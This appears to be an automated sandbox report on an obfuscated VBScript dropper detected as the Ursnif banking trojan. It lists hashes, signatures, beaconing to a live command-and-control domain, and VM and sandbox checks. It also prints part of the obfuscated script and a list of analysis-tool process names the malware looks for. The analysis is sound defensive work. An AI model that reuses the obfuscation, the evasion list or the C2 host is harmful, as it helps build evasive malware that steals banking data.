Analysis Report kj3D6ZRVe22Y.vbs

Overview

General Information

Sample Name: kj3D6ZRVe22Y.vbs
Analysis ID: 322813
MD5: 29f8616b521d89870ae36ec7c6191a09
SHA1: 331b95b98a9a2f38989d029b69a868cd6fe25174
SHA256: b77a9bbbb68d9952590ac72be3ba8c29dbf7877165f707f6ecd5a37818028703

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\odious.ar Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 12% Perma Link
Source: http://api10.laptok.at/favicon.ico Virustotal: Detection: 12% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\odious.ar Joe Sandbox ML: detected
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 47.241.19.44 47.241.19.44
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/KTYmNZ5bf/XTdcBfNLtmXRsr75Vr0C/OeXHgmDf_2FlOqAKqNq/CPd1ikmNvqsewQ7L42DntW/zgUn8uNyTFsD3/vV_2FLdy/BVjS7xgkGsnIxA2AwWjUVdQ/gjxWUAmiqU/x_2BpyFRJzRkZjwG5/cREwhd_2FA5f/aT7Te41fH7r/hXmziOURNofiS_/2Bhap8rsHpb95XCotYXw_/2BzP9qD2H2eqC7jF/qRJvyGIpta4JULL/h7omqILdZ6v6aRGPZ4/QFITSw1t3/2vFfq4l_0A_0DRdsRckS/8n6v1uSJjqSytugrylp/wmVxUbImOCRXQnwUWTp8Md/ulcl9WEKGwMFb/0NFnCbp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml0.10.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4f40447a,0x01d6c3bc</date><accdate>0x4f40447a,0x01d6c3bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.10.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4f40447a,0x01d6c3bc</date><accdate>0x4f40447a,0x01d6c3bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.10.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4f42a6ed,0x01d6c3bc</date><accdate>0x4f42a6ed,0x01d6c3bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.10.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4f42a6ed,0x01d6c3bc</date><accdate>0x4f45093f,0x01d6c3bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.10.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4f45093f,0x01d6c3bc</date><accdate>0x4f45093f,0x01d6c3bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.10.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4f45093f,0x01d6c3bc</date><accdate>0x4f45093f,0x01d6c3bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Nov 2020 21:20:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {795E0900-2FAF-11EB-90E4-ECF4BB862DED}.dat.10.dr String found in binary or memory: http://api10.laptok.at/api1/KTYmNZ5bf/XTdcBfNLtmXRsr75Vr0C/OeXHgmDf_2FlOqAKqNq/CPd1ikmNvqsewQ7L42Dnt
Source: msapplication.xml.10.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.10.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.10.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.10.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.10.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.10.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.10.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.10.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.256675111.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256654196.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256719307.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256727804.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256630765.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256707386.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256693109.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256605868.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269881981.00000000052A8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.256675111.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256654196.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256719307.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256727804.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256630765.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256707386.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256693109.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256605868.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269881981.00000000052A8000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Java / VBScript file with very long strings (likely obfuscated code)
Source: kj3D6ZRVe22Y.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@4/22@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\kj3D6ZRVe22Y.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\kj3D6ZRVe22Y.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6264 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6264 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder((((78 + (-56.0)) + 273.0) - (301 - 8.0))) + "\")End FunctionFunction tailgate216()REM Shattuck feathertop Elisha caliphate425 Babcock circlet. woodland. drift desist neuritis popular. hasnt jigging Yukon horrendous Laredo Dorset Duffy innumerable deploy soothsay Quantico troubleshoot habitual relict, Thebes Japanese horsetail centrex14 lamplight crocodilian575 shown lepidolite fit momentum mass Anatole circumstance roundup Gustavus potash Martha suds explode Set GbbBCDd = CreateObject("WScript.Shell")' wrap ravenous crossroad menagerie colloidal biopsy lock erasable cutout gestural turnip destruct Munich passbook dazzle cancer marmot mastiff aggrieve chartroom reconcile Weiss slime gridlock Aleutian. latter regretful matrimonial morris longhand Galveston ceil schizophrenic hardcopy Calvert syllabus cider receipt pence, journal orography finger deluxe ineffective heavyweight retinue Dusenberg impeccable yip bloke thermo. scriven oleomargarine. 3958105 nature transient pacify irritable colic aHRUSSw = GbbBCDd.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "598659054" + ".txt"' munch basalt enumerate chlorophyll stater neuropathology client join234 were grandpa Scheherazade molt hope spermatophyte sauce. scent luke664 skulk Tanzania shebang slide tribune Shelby manumitted heritage, testimony luxury author childbirth. perplex648 lanthanide ruminate sequent. 7625579 quod awkward mensuration levity. 7169420 Erie, hydrophilic630 sicken Tom entranceway larval windshield Stanley Bilbao galactic explode630 If WScript.CreateObject("Scripting.FileSystemObject").FileExists(aHRUSSw) ThenDionysus = (((46 + (53 + (-30.0))) + (-63.0)) - 6.0)' bullseye, Russia depletion tachinid tussle annulus again passerby, bacilli trammel brash patentee puppeteer, paschal Barlow divergent semi, Yonkers purpose Paraguay balcony. spirochaete easygoing, 4239014 apparition persuasion chauvinist dial invite primacy hypocritic fairway heartfelt businessman basswood Ron Telefunken cyanate delete ElseDionysus = ((25 + 32.0) + (-((2 + 62.0) - 8.0)))' nightcap planetary example plasma cancer613 Gutenberg market suave Melanesia butch iceland route sophomore interest scabbard syrup. Redmond electroencephalography libation satin. 4384281 sabotage contraindicate board transmittance670 hightail, ceasefire sourwood, Richardson cob bale cabbage Runge148 End Iftailgate216 = DionysusEnd FunctionFunction oratoric()Willie = 0repartee904 = 1000Do While Willie < 100000000' exaltation droopy tetrahedron Kingston cognition scrape downstairs Harriman Roberta. 1666887 poise Keynes teet weird, 8265997 hurrah. daguerreotype sen, Bristol Spiegel mettlesome latter884 praseodymium, NBS whosoever. 4071586 steer. 2033325 wardrobe, polariscope deft aspartic. pulpit181 armpit secant landfill If (Willie = 100000000) Then' burly Barbados spellbound canto shy rutabaga gestural890, 3382132 segment spouse phylum differ. Wier Kas

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\odious.ar Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\odious.ar Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.256675111.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256654196.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256719307.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256727804.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256630765.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256707386.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256693109.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.256605868.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269881981.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\kj3d6zrve22y.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXEPM(D
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE"SE@
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEP
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\odious.ar Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5108 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: wscript.exe, 00000000.00000002.242591705.000002642B440000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.242591705.000002642B440000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.242591705.000002642B440000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.242591705.000002642B440000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: odious.ar.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\inducible.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.234385213.00000264284D9000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000002.241546763.00000264284D8000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000002.241360842.00000264284A1000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
